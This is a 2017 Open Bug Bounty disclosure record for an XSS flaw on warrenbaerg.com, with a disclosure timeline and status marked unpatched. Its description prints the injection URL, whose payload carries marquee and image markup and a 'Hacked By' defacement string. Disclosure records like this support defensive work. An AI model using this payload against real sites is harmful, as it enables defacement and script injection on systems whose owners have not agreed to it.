warrenbaerg.com XSS vulnerability

2017-07-24T23:40:00
ID OBB:267603
Type openbugbounty
Reporter 3lit3
Modified 2017-10-23T08:19:00

Description

Vulnerable URL:
http://www.warrenbaerg.com/contact.php?id=5">&n;=marquee behavior="scroll" direction="left"> ![](<a href=)![](LZ4OPo) width="500" height="500" alt="smile">

Hacked By THT Tracks34

##### Details:

Description| Value  
---|---  
Patched:| No  
Latest check for patch:| 23.10.2017  
Vulnerability type:| XSS  
Vulnerability status:| Publicly disclosed  
Alexa Rank| 10267957  
VIP website status:| No  
Check warrenbaerg.com SSL connection:| (Grade: A)

##### Coordinated Disclosure Timeline:

Description| Value  
---|---  
Vulnerability submitted via Open Bug Bounty| 24 July, 2017 23:40 GMT  
Vulnerability existence verified and confirmed| 25 July, 2017 07:59 GMT  
Generic security notifications sent to website owner| 25 July, 2017 07:59 GMT  
Notification sent to subscribers (without technical details)| 25 July, 2017 10:17 GMT  
Vulnerability details disclosed by researcher| 23 October, 2017 08:19 GMT